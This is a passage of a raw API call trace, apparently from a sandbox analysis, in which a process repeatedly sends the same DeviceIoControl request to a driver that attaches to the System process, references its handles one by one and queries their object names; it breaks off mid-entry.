IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.645] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.645] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.645] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.645] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.645] PsAcquireProcessExitSynchronization () returned 0x0 [0199.645] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.645] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800371d490, HandleInformation=0x0) returned 0x0 [0199.645] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.645] PsReleaseProcessExitSynchronization () returned 0x2 [0199.645] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.645] ObQueryNameString (in: Object=0xfffffa800371d490, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.645] ObfDereferenceObject (Object=0xfffffa800371d490) returned 0x1 [0199.645] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.645] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.646] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0199.646] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.646] PsAcquireProcessExitSynchronization () returned 0x0 [0199.646] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.646] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a1df20, HandleInformation=0x0) returned 0x0 [0199.646] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.646] PsReleaseProcessExitSynchronization () returned 0x2 [0199.646] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.646] ObQueryNameString (in: Object=0xfffffa8003a1df20, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.646] ObfDereferenceObject (Object=0xfffffa8003a1df20) returned 0x2 [0199.646] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.647] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.647] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.647] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0199.647] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.647] PsAcquireProcessExitSynchronization () returned 0x0 [0199.647] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.647] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800e3fb5b0, HandleInformation=0x0) returned 0x0 [0199.647] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.647] PsReleaseProcessExitSynchronization () returned 0x2 [0199.647] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.647] ObQueryNameString (in: Object=0xfffffa800e3fb5b0, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.648] ObfDereferenceObject (Object=0xfffffa800e3fb5b0) returned 0x2 [0199.648] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.648] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.648] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.648] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.648] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.648] PsAcquireProcessExitSynchronization () returned 0x0 [0199.648] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.648] ObReferenceObjectByHandle (in: Handle=0xffffffff800004ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800a8713a0, HandleInformation=0x0) returned 0x0 [0199.648] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.648] PsReleaseProcessExitSynchronization () returned 0x2 [0199.648] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.649] ObQueryNameString (in: Object=0xfffffa800a8713a0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.649] ObfDereferenceObject (Object=0xfffffa800a8713a0) returned 0x2 [0199.649] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.649] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.649] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.649] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.649] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.649] PsAcquireProcessExitSynchronization () returned 0x0 [0199.649] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.649] ObReferenceObjectByHandle (in: Handle=0xffffffff800004f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f7f980, HandleInformation=0x0) returned 0x0 [0199.650] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.650] PsReleaseProcessExitSynchronization () returned 0x2 [0199.650] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.650] ObQueryNameString (in: Object=0xfffffa8001f7f980, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.650] ObfDereferenceObject (Object=0xfffffa8001f7f980) returned 0x2 [0199.650] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.650] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.650] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.650] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.650] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.651] PsAcquireProcessExitSynchronization () returned 0x0 [0199.651] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.651] ObReferenceObjectByHandle (in: Handle=0xffffffff800004fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a6aa10, HandleInformation=0x0) returned 0x0 [0199.651] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.651] PsReleaseProcessExitSynchronization () returned 0x2 [0199.651] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.651] ObQueryNameString (in: Object=0xfffffa8003a6aa10, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.651] ObfDereferenceObject (Object=0xfffffa8003a6aa10) returned 0x2 [0199.651] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.651] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.651] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.651] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.652] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.652] PsAcquireProcessExitSynchronization () returned 0x0 [0199.652] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.652] ObReferenceObjectByHandle (in: Handle=0xffffffff80000500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8009bbc9d0, HandleInformation=0x0) returned 0x0 [0199.652] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.652] PsReleaseProcessExitSynchronization () returned 0x2 [0199.652] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.652] ObQueryNameString (in: Object=0xfffffa8009bbc9d0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.652] ObfDereferenceObject (Object=0xfffffa8009bbc9d0) returned 0x2 [0199.652] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.652] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.653] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.653] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.653] PsAcquireProcessExitSynchronization () returned 0x0 [0199.653] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.653] ObReferenceObjectByHandle (in: Handle=0xffffffff80000504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a75d50, HandleInformation=0x0) returned 0x0 [0199.653] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.653] PsReleaseProcessExitSynchronization () returned 0x2 [0199.653] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.653] ObQueryNameString (in: Object=0xfffffa8003a75d50, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.653] ObfDereferenceObject (Object=0xfffffa8003a75d50) returned 0x2 [0199.653] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.654] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.654] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0199.654] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.654] PsAcquireProcessExitSynchronization () returned 0x0 [0199.654] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.654] ObReferenceObjectByHandle (in: Handle=0xffffffff80000508, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800382e210, HandleInformation=0x0) returned 0x0 [0199.654] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.654] PsReleaseProcessExitSynchronization () returned 0x2 [0199.654] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.654] ObQueryNameString (in: Object=0xfffffa800382e210, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.654] ObfDereferenceObject (Object=0xfffffa800382e210) returned 0x2 [0199.655] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.655] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.655] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.655] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.655] PsAcquireProcessExitSynchronization () returned 0x0 [0199.655] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.655] ObReferenceObjectByHandle (in: Handle=0xffffffff8000050c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a66850, HandleInformation=0x0) returned 0x0 [0199.655] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.656] PsReleaseProcessExitSynchronization () returned 0x2 [0199.656] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.656] ObQueryNameString (in: Object=0xfffffa8003a66850, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.656] ObfDereferenceObject (Object=0xfffffa8003a66850) returned 0x2 [0199.656] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.656] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.656] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.656] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.656] PsAcquireProcessExitSynchronization () returned 0x0 [0199.656] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.656] ObReferenceObjectByHandle (in: Handle=0xffffffff80000510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003809d20, HandleInformation=0x0) returned 0x0 [0199.657] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.657] PsReleaseProcessExitSynchronization () returned 0x2 [0199.657] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.657] ObQueryNameString (in: Object=0xfffffa8003809d20, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.657] ObfDereferenceObject (Object=0xfffffa8003809d20) returned 0x2 [0199.657] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.657] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.657] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.657] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.657] PsAcquireProcessExitSynchronization () returned 0x0 [0199.658] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.658] ObReferenceObjectByHandle (in: Handle=0xffffffff80000514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001967a30, HandleInformation=0x0) returned 0x0 [0199.658] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.658] PsReleaseProcessExitSynchronization () returned 0x2 [0199.658] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.658] ObQueryNameString (in: Object=0xfffffa8001967a30, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.658] ObfDereferenceObject (Object=0xfffffa8001967a30) returned 0x2 [0199.658] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.658] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.658] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.659] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.659] PsAcquireProcessExitSynchronization () returned 0x0 [0199.659] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.659] ObReferenceObjectByHandle (in: Handle=0xffffffff80000518, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037ccbd0, HandleInformation=0x0) returned 0x0 [0199.659] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.659] PsReleaseProcessExitSynchronization () returned 0x2 [0199.659] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.659] ObQueryNameString (in: Object=0xfffffa80037ccbd0, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.659] ObfDereferenceObject (Object=0xfffffa80037ccbd0) returned 0x2 [0199.659] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.660] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.660] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.660] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.660] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.660] PsAcquireProcessExitSynchronization () returned 0x0 [0199.660] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.660] ObReferenceObjectByHandle (in: Handle=0xffffffff8000051c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002af6f20, HandleInformation=0x0) returned 0x0 [0199.660] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.660] PsReleaseProcessExitSynchronization () returned 0x2 [0199.660] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.660] ObQueryNameString (in: Object=0xfffffa8002af6f20, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.660] ObfDereferenceObject (Object=0xfffffa8002af6f20) returned 0x2 [0199.661] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.661] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.661] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.661] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.661] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.661] PsAcquireProcessExitSynchronization () returned 0x0 [0199.661] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.661] ObReferenceObjectByHandle (in: Handle=0xffffffff80000520, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e8c1f0, HandleInformation=0x0) returned 0x0 [0199.661] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.661] PsReleaseProcessExitSynchronization () returned 0x2 [0199.661] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.661] ObQueryNameString (in: Object=0xfffffa8001e8c1f0, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.662] ObfDereferenceObject (Object=0xfffffa8001e8c1f0) returned 0x2 [0199.662] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.662] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.662] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.662] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, 